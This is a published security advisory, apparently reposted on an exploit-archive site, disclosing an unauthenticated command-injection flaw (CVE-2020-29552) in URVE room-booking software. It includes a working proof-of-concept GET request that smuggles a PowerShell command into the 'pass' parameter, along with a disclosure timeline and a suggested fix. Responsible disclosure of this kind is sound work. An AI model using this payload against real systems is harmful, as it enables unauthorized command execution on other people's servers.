URVE Software Build 24.03.2020 Authentication Bypass / Remote Code Execution

2020.12.30
Credit: Erik Steltzner
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2020-29552
CWE: CWE-306


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2020-040 Product: URVE Software Manufacturer: Eveo Sp. z o.o. Affected Version(s): Build "24.03.2020" Tested Version(s): Build "24.03.2020" Vulnerability Type: Missing Authentication for Critical Function (CWE-306) Risk Level: High Solution Status: Open Manufacturer Notification: 2020-11-10 Solution Date: 2020-11-18 Public Disclosure: 2020-12-23 CVE Reference: CVE-2020-29552 Authors of Advisory: Erik Steltzner, SySS GmbH Christoph Ritter, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: URVE is a system for reserving rooms which also provides a web interface with event scheduler. The manufacturer describes the product as follows (see [1] and [2]): 'Booking rooms on touchscreen and easy integration with MS Exchange, Lotus, Office 365, Google Calendar and other systems. Great looking schedules right at the door. Fight conference room theft with our 10" touchscreen wall-mounted panel.' 'Manage displays, edit playlists and HTML5 content easily. Our server can be installed on any Windows and works smoothly from web browser.' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: With a manipulated GET request, it is possible to execute unauthenticated system commands. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Using the following request, it is possible to execute a PowerShell command. _internal/pc/vpro.php?mac=0&ip=0&operation=0&usr=0&pass=0%3bpowershell+-c+ "whoami+>+C%3a\URVE\Profiles\urve\uploads\out" The following path contains the output of the previously executed command. /urve/uploads/out ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The passed GET parameters should be escaped. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2020-10-28: Vulnerability discovered 2020-11-10: Vulnerability reported to manufacturer 2020-11-18: Patch released by manufacturer 2020-12-23: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product Website for URVE https://urve.co.uk/system-rezerwacji-sal [2] Product website for URVE https://urve.co.uk [3] SySS Security Advisory SYSS-2020-040 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-040.txt [4] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Erik Steltzner and Christoph Ritter of SySS GmbH. E-Mail: erik.steltzner@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Erik_Steltzner.asc Key ID: 0x4C7979CE53163268 Key Fingerprint: 6538 8216 555B FBE7 1E01 7FBD 4C79 79CE 5316 3268 E-Mail: christoph.ritter@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Christoph_Ritter.asc Key ID: 0x05458E666D35EAE8 Key Fingerprint: 9FB0 1B9B 2F72 3DD5 3AF3 62D8 0545 8E66 6D35 EAE8 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEZTiCFlVb++ceAX+9THl5zlMWMmgFAl/i+0kACgkQTHl5zlMW Mmhhaw//d2l3sRso92bYcrGumrmv7ab7cOE6RRYnJ7UWRlMgFBERpE2n/ec1yi8A cC/8xmWN9zmb5GMRI6QAkBPHLFXhNKmsukv/Rr/Zo2w8mwFRySiv5XWPJ/v331rY EKwJVA7PF0gxcucP5fNjgzf2fkLxxX7vWvPR4up6YiXFCIRpQ8SvOSMf8S3w/CeW fORR5QaCKHuzLRHk78oZw9Yrs3xdKbWXdu9zU9hycoHYj5oBOFHRuGG2B/Xvwuqj g7UjLZ4QEIWP25yFs5QybsMy2psJuig8B8/E2D1oXxNgbvh/jBrT4kdvpmBDkjC3 yW+beC7iRTJ/LH/v5G66ytB6WCpUq0uBFhraBunLBbhMavIggmHvT9dRaGOswgWZ TKoREn46HtqbNHhpToLEkJTqEf4Onv8ih+MjYCSgKXdsuxhtEvMRBod3XFb028M0 id+Q6Syu34TSLu1ArnDoDpLWcUU6tZ4r+rn+ZDOJd3Jkykdk+h0ewEpp7LfhKBFO QpbfU1by1Xs7nz8KK7QhDVnr6KCKBRtqQnVvmUQLZLxwOjARJSjj5TptA5rUB7U1 7ZVFKad+d9v1I0bMwHc5J3XjPgNajhOSa9haFad1zMyuJ5+Zb2qETMg5griCY6nQ RHixBPt6QJaN+rPHnavCY2gcRafQHUBYsfwok6iOk+4MXRX8SzM= =AvxJ -----END PGP SIGNATURE-----


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top